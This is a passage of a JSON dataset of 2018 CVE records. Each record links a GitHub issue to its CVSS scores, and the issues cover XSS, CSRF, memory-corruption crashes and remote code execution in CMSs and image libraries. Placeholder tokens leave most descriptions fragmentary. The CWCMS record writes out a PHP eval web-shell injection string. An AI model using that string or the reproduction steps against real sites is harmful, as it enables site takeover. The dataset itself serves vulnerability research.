    },
    {
        "CVE_ID": "CVE-2018-8814",
        "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/671",
        "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/671",
        "Repo_new": "wolfcms/wolfcms",
        "Issue_Created_At": "2018-03-18T12:47:16Z",
        "description": "APITAG NUMBERTAG Cross Site Request Forgery. Steps to reproduce the problem Send below request to logged in user to change the plugin settings. FILETAG Also an attacker remotely uninstall any plugin by simply sending below URL. URLTAG Additional information Wolf CMS version NUMBERTAG Please include narvaneni. EMAILTAG in fix release.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-8815",
        "Issue_Url_old": "https://github.com/alkacon/opencms-core/issues/587",
        "Issue_Url_new": "https://github.com/alkacon/opencms-core/issues/587",
        "Repo_new": "alkacon/opencms-core",
        "Issue_Created_At": "2018-03-20T05:29:34Z",
        "description": "Stored Cross Site Scripting via SVG image upload in Gallery Functionality. Dear Team, i would like to report persistent xss vulnerability in latest release. Mitre.org assigned a CVE ID for this. Description: Cross Site Scripting (XSS) Vulnerability in Gallery functionality in APITAG NUMBERTAG allows remote attackers to execute arbitrary web script via crafted svg image. Steps to Reproduce NUMBERTAG Login as user who is having Gallery Editor role NUMBERTAG Navigate to gallery and upload below svg file. CODETAG NUMBERTAG Once other user who is having Root Administrator permissions visited the image link or viewed the uploaded svg image the script get executed. Fix: Input file validation Affected Version NUMBERTAG latest release",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.6,
        "impactScore": 2.5,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2018-8832",
        "Issue_Url_old": "https://github.com/enhavo/enhavo/issues/459",
        "Issue_Url_new": "https://github.com/enhavo/enhavo/issues/459",
        "Repo_new": "enhavo/enhavo",
        "Issue_Created_At": "2018-03-13T04:49:26Z",
        "description": "Admin page Stored Cross site Scripting (XSS). Summary FILETAG has XSS security issue on the admin page. An authorized attacker can put any kind of javascript. And it is executed on authorized Victim browser without induce Reproduction Here is how to reproduce this issue NUMBERTAG Access to the admin page NUMBERTAG Create an Usergroup as payloads NUMBERTAG Back to admin user group page. Then you find that dialog appeared and XSS happens. Payloads Set Usergroup as following. ERRORTAG Event NUMBERTAG uln is discovered NUMBERTAG Contact to developers NUMBERTAG No response and full disclosure",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-8899",
        "Issue_Url_old": "https://github.com/IdentityServer/IdentityServer4/issues/2164",
        "Issue_Url_new": "https://github.com/identityserver/identityserver4/issues/2164",
        "Repo_new": "identityserver/identityserver4",
        "Issue_Created_At": "2018-03-20T13:19:18Z",
        "description": "Encode redirect uri on authorization response.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-8960",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1020",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1020",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-03-13T08:25:23Z",
        "description": "heap buffer overflow. PATHTAG convert version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig fpx freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff webp wmf x xml zlib PATHTAG convert tif_heap buffer overflow dev/null APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG c NUMBERTAG c NUMBERTAG c at pc NUMBERTAG f NUMBERTAG a3bc NUMBERTAG bp NUMBERTAG ffc3e5db NUMBERTAG sp NUMBERTAG ffc3e5db NUMBERTAG READ of size NUMBERTAG at NUMBERTAG c NUMBERTAG c NUMBERTAG c thread T NUMBERTAG f NUMBERTAG a3bc NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG e0 in APITAG APITAG NUMBERTAG f NUMBERTAG a in APITAG APITAG NUMBERTAG f NUMBERTAG e3e NUMBERTAG f in APITAG APITAG NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG d9 in APITAG APITAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG c NUMBERTAG c NUMBERTAG c is located NUMBERTAG bytes inside of NUMBERTAG byte region FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-8961",
        "Issue_Url_old": "https://github.com/libming/libming/issues/130",
        "Issue_Url_new": "https://github.com/libming/libming/issues/130",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-03-22T03:27:43Z",
        "description": "multiple heap use after frees in decompile.c. In latest version NUMBERTAG and commit of libming, there are multiple heap use after frees in PATHTAG functions of decompile.c, which could be triggered by the POCs below. To reproduce the issue, compile with ASAN and run: ./swftophp $POC ./swftophp libming NUMBERTAG swftophp_heap use after APITAG APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG fef9 bp NUMBERTAG ffc4b NUMBERTAG a NUMBERTAG sp NUMBERTAG ffc4b NUMBERTAG a NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG fef8 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG efe9f3e0c NUMBERTAG in __libc_start_main APITAG NUMBERTAG ERRORTAG NUMBERTAG d3 ( PATHTAG ERRORTAG NUMBERTAG d3) ./swftophp libming NUMBERTAG swftophp_heap use after APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG eed4 bp NUMBERTAG ffd4a NUMBERTAG ba NUMBERTAG sp NUMBERTAG ffd4a NUMBERTAG ba NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG eed3 in APITAG PATHTAG NUMBERTAG c in APITAG PATHTAG NUMBERTAG c in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG b9c NUMBERTAG in __libc_start_main APITAG NUMBERTAG ERRORTAG NUMBERTAG d3 ( PATHTAG ERRORTAG NUMBERTAG d3) ./swftophp FILETAG libming NUMBERTAG swftophp_heap use after APITAG APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG a0 at pc NUMBERTAG fef9 bp NUMBERTAG ffd NUMBERTAG d NUMBERTAG db0 sp NUMBERTAG ffd NUMBERTAG d NUMBERTAG da8 READ of size NUMBERTAG at NUMBERTAG a0 thread T NUMBERTAG fef8 in APITAG PATHTAG NUMBERTAG bd NUMBERTAG in APITAG PATHTAG NUMBERTAG bd NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG a5ac NUMBERTAG in __libc_start_main APITAG NUMBERTAG ERRORTAG NUMBERTAG d3 ( PATHTAG ERRORTAG NUMBERTAG d3)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-8972",
        "Issue_Url_old": "https://github.com/CREDITWEST/CWCMS/issues/1",
        "Issue_Url_new": "https://github.com/creditwest/cwcms/issues/1",
        "Repo_new": "creditwest/cwcms",
        "Issue_Created_At": "2018-03-24T13:28:18Z",
        "description": "Cwcms Backstage CSRF Getshaell.. APITAG PHP NUMBERTAG can write \";eval($_POST['x']);// to the site configuration getshell, which can be used in conjunction with the website configuration CSRF vulnerability getshell.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-8976",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/246",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/246",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-03-23T09:37:18Z",
        "description": "a bug in APITAG a bug results to segment fault in APITAG and it maybe a string format vulnerability which could be exploited. the debug info as follows: Breakpoint NUMBERTAG APITAG (format NUMBERTAG ffff NUMBERTAG a NUMBERTAG ld NUMBERTAG ff NUMBERTAG s\") at APITAG NUMBERTAG rc = vsnprintf(&buffer NUMBERTAG APITAG format, args); gdb peda$ n Program received signal SIGSEGV, Segmentation fault. [ registers ] RA NUMBERTAG RB NUMBERTAG fffffffd NUMBERTAG ffffbad NUMBERTAG RC NUMBERTAG ffffffffffffffff RD NUMBERTAG RSI NUMBERTAG fffffe8 RDI NUMBERTAG RBP NUMBERTAG fffffffd NUMBERTAG b NUMBERTAG fffffff\") RSP NUMBERTAG fffffffcf NUMBERTAG RIP NUMBERTAG ffff6d NUMBERTAG APITAG repnz scas al,BYTE PTR es:[rdi]) R NUMBERTAG fffffff R NUMBERTAG ffff7fe NUMBERTAG ffff7fe NUMBERTAG R NUMBERTAG ffff NUMBERTAG bfe NUMBERTAG R NUMBERTAG R NUMBERTAG ffff6d NUMBERTAG f NUMBERTAG APITAG cmp BYTE PTR [rbp NUMBERTAG R NUMBERTAG R NUMBERTAG ffff NUMBERTAG a NUMBERTAG ld NUMBERTAG ff NUMBERTAG s\") R NUMBERTAG fffffffd6e NUMBERTAG EFLAGS NUMBERTAG carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [ code NUMBERTAG ffff6d NUMBERTAG a APITAG : xor eax,ea NUMBERTAG ffff6d NUMBERTAG c APITAG : or rc NUMBERTAG ffffffffffffffff NUMBERTAG ffff6d NUMBERTAG APITAG : mov rdi,r NUMBERTAG ffff6d NUMBERTAG APITAG : repnz scas al,BYTE PTR es:[rdi NUMBERTAG ffff6d NUMBERTAG APITAG : mov DWORD PTR [rbp NUMBERTAG ffff6d NUMBERTAG f APITAG : mov rsi,rc NUMBERTAG ffff6d NUMBERTAG APITAG : not rsi NUMBERTAG ffff6d NUMBERTAG APITAG : lea r NUMBERTAG rsi NUMBERTAG stack NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffd0b NUMBERTAG ffffffffffffffff NUMBERTAG fffffffcf NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffff6d NUMBERTAG in _IO_vfprintf_internal (s=s APITAG format=<optimized out>, format APITAG NUMBERTAG ld NUMBERTAG ff NUMBERTAG s\", ap=ap APITAG at APITAG NUMBERTAG fprintf.c: No such file or directory. gdb peda$ bt NUMBERTAG ffff6d NUMBERTAG in _IO_vfprintf_internal (s=s APITAG format=<optimized out>, format APITAG NUMBERTAG ld NUMBERTAG ff NUMBERTAG s\", ap=ap APITAG at APITAG NUMBERTAG ffff6d2d NUMBERTAG in _IO_vsnprintf (string NUMBERTAG b NUMBERTAG fffffff\", maxlen=<optimized out>, format NUMBERTAG ffff NUMBERTAG a NUMBERTAG ld NUMBERTAG ff NUMBERTAG s\", args NUMBERTAG fffffffd6e0) at APITAG NUMBERTAG ffff NUMBERTAG d in APITAG (format NUMBERTAG ffff NUMBERTAG a NUMBERTAG ld NUMBERTAG ff NUMBERTAG s\") at APITAG NUMBERTAG ffff NUMBERTAG e9 in APITAG (this NUMBERTAG a NUMBERTAG out=..., APITAG depth NUMBERTAG at APITAG NUMBERTAG cafe in APITAG (this NUMBERTAG e0, out=..., APITAG at APITAG NUMBERTAG c NUMBERTAG b in APITAG (this NUMBERTAG e0, PATHTAG ) at APITAG NUMBERTAG e NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffe4b8) at APITAG NUMBERTAG ffff6cdcf NUMBERTAG in __libc_start_main (main NUMBERTAG e NUMBERTAG e <main(int, char const )>, argc NUMBERTAG arg NUMBERTAG fffffffe4b8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe4a8) at libc APITAG NUMBERTAG dfb9 in _start () APITAG the bug trigger commandline is : PATHTAG pS $POC please ref the following url for the poc: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-8977",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/247",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/247",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-03-23T09:57:44Z",
        "description": "Invalid memory access in APITAG An Invalid memory access in APITAG in APITAG the debug info as follows : s ] RA NUMBERTAG b8 RB NUMBERTAG RC NUMBERTAG fffffffdb NUMBERTAG ERRORTAG NUMBERTAG d NUMBERTAG f ('/P') RD NUMBERTAG ad NUMBERTAG RSI NUMBERTAG fffffffdbdf NUMBERTAG RDI NUMBERTAG ad NUMBERTAG RBP NUMBERTAG fffffffdd NUMBERTAG fffffffde NUMBERTAG fffffffde NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG RSP NUMBERTAG fffffffdc NUMBERTAG RIP NUMBERTAG ffff NUMBERTAG bf APITAG APITAG const&, APITAG const NUMBERTAG mov rax,QWORD PTR [rax]) R NUMBERTAG R NUMBERTAG R NUMBERTAG fffffffda NUMBERTAG R NUMBERTAG cf1c APITAG APITAG const>: push rbp) R NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry PARITY adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff NUMBERTAG b3 APITAG APITAG const&, APITAG const NUMBERTAG mov rdx,ra NUMBERTAG ffff NUMBERTAG b6 APITAG APITAG const&, APITAG const NUMBERTAG mov rax,QWORD PTR [rd NUMBERTAG ffff NUMBERTAG b9 APITAG APITAG const&, APITAG const NUMBERTAG add ra NUMBERTAG b NUMBERTAG ffff NUMBERTAG bf APITAG APITAG const&, APITAG const NUMBERTAG mov rax,QWORD PTR [ra NUMBERTAG ffff NUMBERTAG c2 APITAG APITAG const&, APITAG const NUMBERTAG mov rdi,rd NUMBERTAG ffff NUMBERTAG c5 APITAG APITAG const&, APITAG const NUMBERTAG call ra NUMBERTAG ffff NUMBERTAG c7 APITAG APITAG const&, APITAG const NUMBERTAG mov rdx,ra NUMBERTAG ffff NUMBERTAG ca APITAG APITAG const&, APITAG const NUMBERTAG lea rax,[rbp NUMBERTAG d0] [ stack NUMBERTAG fffffffdc NUMBERTAG fffffffdc NUMBERTAG f NUMBERTAG b4f NUMBERTAG fffffffdc NUMBERTAG fffffffdc NUMBERTAG ac NUMBERTAG a NUMBERTAG f NUMBERTAG d9c NUMBERTAG da NUMBERTAG fffffffdc NUMBERTAG ffff7b NUMBERTAG d NUMBERTAG ffff NUMBERTAG APITAG APITAG push rbp NUMBERTAG fffffffdc NUMBERTAG fffffffde NUMBERTAG ffff NUMBERTAG b NUMBERTAG ffff NUMBERTAG a0 APITAG push rb NUMBERTAG fffffffdc NUMBERTAG ffff7b NUMBERTAG c NUMBERTAG fffffffdc NUMBERTAG ffff7b NUMBERTAG a NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffff NUMBERTAG bf in APITAG (os=..., value=..., metadata NUMBERTAG ac0) at APITAG NUMBERTAG if( metadata APITAG )) APITAG == APITAG EOS NUMBERTAG D\" gdb peda$ bt NUMBERTAG ffff NUMBERTAG bf in APITAG (os=..., value=..., metadata NUMBERTAG ac0) at APITAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG in APITAG (os=..., value=..., metadata NUMBERTAG ac0) at APITAG NUMBERTAG ffff NUMBERTAG ce NUMBERTAG in APITAG (this NUMBERTAG os=..., APITAG at APITAG NUMBERTAG ffff NUMBERTAG f9ba in APITAG (this NUMBERTAG APITAG at APITAG NUMBERTAG in APITAG (this NUMBERTAG md=..., APITAG at APITAG NUMBERTAG fda6 in APITAG (this NUMBERTAG image NUMBERTAG ab0) at APITAG NUMBERTAG fcd4 in APITAG (this NUMBERTAG at APITAG NUMBERTAG c NUMBERTAG b in APITAG (this NUMBERTAG PATHTAG ) at APITAG NUMBERTAG e NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG NUMBERTAG ffff6cdcf NUMBERTAG in __libc_start_main (main NUMBERTAG e NUMBERTAG e <main(int, char const )>, argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe NUMBERTAG at libc APITAG NUMBERTAG dfb9 in _start () ============ the bug trigger commandline is : PATHTAG pt $POC please ref the following url for the poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-9009",
        "Issue_Url_old": "https://github.com/libming/libming/issues/131",
        "Issue_Url_new": "https://github.com/libming/libming/issues/131",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-03-25T01:21:59Z",
        "description": "heap use after free in APITAG (decompile.c). In latest version of libming NUMBERTAG there is a heap buffer overflow in APITAG function of decompile.c file, which could be triggered by the POC below. The \"FREE\" operation corresponds to a \"realloc\" in APITAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG (FILE f, int length NUMBERTAG while ( APITAG < end NUMBERTAG APITAG (f, &(parserrec APITAG parserrec APITAG NUMBERTAG parserrec APITAG = (SWF_ACTION ) realloc (parserrec APITAG NUMBERTAG The freed heap is used in APITAG function APITAG NUMBERTAG static int NUMBERTAG APITAG n, SWF_ACTION actions, int maxn NUMBERTAG if (sactif > Actions FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-9037",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/433",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/433",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2018-03-28T10:45:33Z",
        "description": "a remote code execution vulnerability.. Hi, I have found a remote code execution vulnerability. Affected Version NUMBERTAG or before Monstra CMS NUMBERTAG allows remote code execution via an upload_file request for a .zip file which is automatically extracted and may contain .php files. Payload: FILETAG FILETAG Direct compression without checking and We can construct a zip plug in that can execute commands FILETAG Testing Environment: os: mac PHP NUMBERTAG Mitigation: Perform security check before decompressing plug in archives",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-9038",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/434",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/434",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2018-03-28T10:57:11Z",
        "description": "Insecure Permissions Vulnerability. Hi, I found another vulnerability. Affected Version NUMBERTAG or before payload FILETAG Steps to replicate: Please see attachment FILETAG Impacts: Monstra CMS NUMBERTAG allows remote attackers to delete files via an PATHTAG request.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-9039",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4407",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4407",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2018-03-20T23:28:57Z",
        "description": "Deployment Targets visible when scoping APITAG Variable sets for logged in Users whose Team is not scoped to the required Environments. Octopus Version: Tested and replicated in Octopus Version NUMBERTAG Issue: When scoping Project or Library Variables it's possible to specify specific Deployment Targets. In this instance, however, Users are able to view deployment targets and create associated Variables despite the logged in Users Team not being scoped to the appropriate environment. Replication Steps NUMBERTAG Create a new Octopus user with appropriate permissions to edit/view APITAG variable sets NUMBERTAG Create a Team that is scoped to a specific environment (in this example the Testing environment), see below; FILETAG In this example, the Testing environment contains only two deployment targets Offline Package Target and Testing FILETAG NUMBERTAG Login to Octopus as the created User NUMBERTAG Navigate to either the Variables within a Project or Library Set (In this example, this is demonstrating via the Project Variables) and create a new variable, when scoping this variable to a specific target, all targets are viewable not just the two belonging to the associated Team. FILETAG It is then possible to save this change as shown below; FILETAG Source: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-9055",
        "Issue_Url_old": "https://github.com/mdadams/jasper/issues/172",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/172",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2018-03-27T02:31:54Z",
        "description": "Reachable assertions in jpc_firstone. Description of problem: There is a reachable assertion abort in function jpc_firstone of APITAG that will lead to remote denial of service attack. Version Release number of selected component (if applicable): <= latest version The output information is as follows: CODETAG The gdb debugging information is listed below: ERRORTAG jpc_firstone in jpc_math.c CODETAG Additional info: Credits: pwd MENTIONTAG poc URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-9132",
        "Issue_Url_old": "https://github.com/libming/libming/issues/133",
        "Issue_Url_new": "https://github.com/libming/libming/issues/133",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-03-29T14:59:42Z",
        "description": "Null pointer dereference in APITAG (decompile.c). On latest version of libming and commit APITAG there is a null pointer dereference in APITAG function of decompile.c file, which could be triggered by the POC below. To reproduce the issue, run ./swftophp $POC The POC is attached NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG c NUMBERTAG bp NUMBERTAG sp NUMBERTAG ffca3ae5e NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG a0e4 in APITAG PATHTAG NUMBERTAG a0e4 in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG fd NUMBERTAG bc2c NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG PATHTAG ERRORTAG NUMBERTAG APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in APITAG NUMBERTAG ABORTING FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-9135",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1009",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1009",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-03-02T06:16:43Z",
        "description": "heap buffer overflow . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Modules APITAG Delegates (built in): bzlib djvu fftw flif fontconfig fpx freetype jbig jng jp2 jpeg lcms ltdl openexr pangocairo png raw tiff webp wmf x xml zlib ASAN OUTPUT APITAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): ubuntu NUMBERTAG server i NUMBERTAG Additional information: Found by: Wang Yan APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-9144",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/254",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/254",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-03-29T01:30:57Z",
        "description": "Two out of bound read when read tiff file. out of bound read in function APITAG and APITAG the result info with valgrind as follows: the first one NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: PATHTAG crashes NUMBERTAG APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Address NUMBERTAG b5ba2 is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2B NUMBERTAG operator APITAG long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG C9B NUMBERTAG at NUMBERTAG B NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY 